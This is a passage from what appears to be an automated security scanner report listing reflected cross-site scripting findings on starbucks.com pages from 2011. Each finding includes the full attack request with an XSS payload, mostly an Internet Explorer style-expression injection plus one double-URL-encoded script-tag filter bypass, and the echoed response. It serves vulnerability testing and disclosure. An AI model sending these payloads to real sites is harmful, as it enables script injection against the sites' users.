GET /customer-service/faqs/coffeehouse?835ba"style%3d"x%3aexpression(alert(1))"de67136c231=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:10:16 GMT Connection: close Content-Length: 59203
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?835ba"style="x:expression(alert(1))"de67136c231=1"/> ...[SNIP]...
1.688. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b07"style%3d"x%3aexpression(alert(1))"d430c70698c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67b07"style="x:expression(alert(1))"d430c70698c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/menu?67b07"style%3d"x%3aexpression(alert(1))"d430c70698c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:09:46 GMT Connection: close Content-Length: 37148
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?67b07"style="x:expression(alert(1))"d430c70698c=1"/> ...[SNIP]...
1.689. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/responsibility
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82a22"style="x:expression(alert(1))"ae90a773c06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/responsibility?82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:10:05 GMT Connection: close Content-Length: 37371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?82a22"style="x:expression(alert(1))"ae90a773c06=1"/> ...[SNIP]...
1.690. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/shop
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52686"style%3d"x%3aexpression(alert(1))"0dd78febff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52686"style="x:expression(alert(1))"0dd78febff8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/shop?52686"style%3d"x%3aexpression(alert(1))"0dd78febff8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:10:47 GMT Connection: close Content-Length: 51738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?52686"style="x:expression(alert(1))"0dd78febff8=1"/> ...[SNIP]...
1.691. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f06e7"style="x:expression(alert(1))"79ab42fc008 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu?f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008=1 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Referer: http://www.starbucks.com/search?keywords=%27 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.2.10.1297134218; _chartbeat2=vqos4oan0hnfddev
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:04:51 GMT Content-Length: 73370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu?f06e7"style="x:expression(alert(1))"79ab42fc008=1"/> ...[SNIP]...
1.692. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfba3"style="x:expression(alert(1))"49bff4af7b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /menu/?dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:08:07 GMT Connection: close Content-Length: 73370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu?dfba3"style="x:expression(alert(1))"49bff4af7b5=1"/> ...[SNIP]...
1.693. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/catalog/nutrition
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd71c"style="x:expression(alert(1))"a1cc417fc6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/catalog/nutrition?drink=bottled-drinks&cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:08:57 GMT Connection: close Content-Length: 45151
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/catalog/nutrition?drink=bottled-drinks&cd71c"style="x:expression(alert(1))"a1cc417fc6c=1"/> ...[SNIP]...
The value of the wellness request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e was submitted in the wellness parameter. This input was echoed as b4984"><script>alert(1)</script>7b93903311e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the wellness request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /menu/catalog/nutrition?food=all&wellness=high-fiberb4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:06:31 GMT Connection: close Content-Length: 54080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <a href="http://www.starbucks.com:80/menu/catalog/nutrition?food=all&wellness=high-fiberb4984"><script>alert(1)</script>7b93903311e&page=2"> ...[SNIP]...
1.695. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decb7"style%3d"x%3aexpression(alert(1))"f7af35945af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as decb7"style="x:expression(alert(1))"f7af35945af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks?decb7"style%3d"x%3aexpression(alert(1))"f7af35945af=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:42:39 GMT Connection: close Content-Length: 62628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks?decb7"style="x:expression(alert(1))"f7af35945af=1"/> ...[SNIP]...
1.696. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f952b"style%3d"x%3aexpression(alert(1))"627ac60126a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f952b"style="x:expression(alert(1))"627ac60126a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style%3d"x%3aexpression(alert(1))"627ac60126a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:30:36 GMT Connection: close Content-Length: 39912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style="x:expression(alert(1))"627ac60126a=1"/> ...[SNIP]...
1.697. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5154"style="x:expression(alert(1))"95d490ebdf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:31:31 GMT Connection: close Content-Length: 39835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style="x:expression(alert(1))"95d490ebdf8=1"/> ...[SNIP]...
1.698. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2a3a"style="x:expression(alert(1))"a035c85f5f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:31:30 GMT Connection: close Content-Length: 39905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style="x:expression(alert(1))"a035c85f5f9=1"/> ...[SNIP]...
1.699. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 895ee"style="x:expression(alert(1))"e3d116c9abe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:29:31 GMT Connection: close Content-Length: 39704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style="x:expression(alert(1))"e3d116c9abe=1"/> ...[SNIP]...
1.700. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe726"style="x:expression(alert(1))"d19a9e87e85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:29:38 GMT Connection: close Content-Length: 39838
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style="x:expression(alert(1))"d19a9e87e85=1"/> ...[SNIP]...
1.701. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/bottled-drinks/coffee-frappuccino
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76702"style="x:expression(alert(1))"b4ae84575bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/coffee-frappuccino?76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:30:51 GMT Connection: close Content-Length: 39815
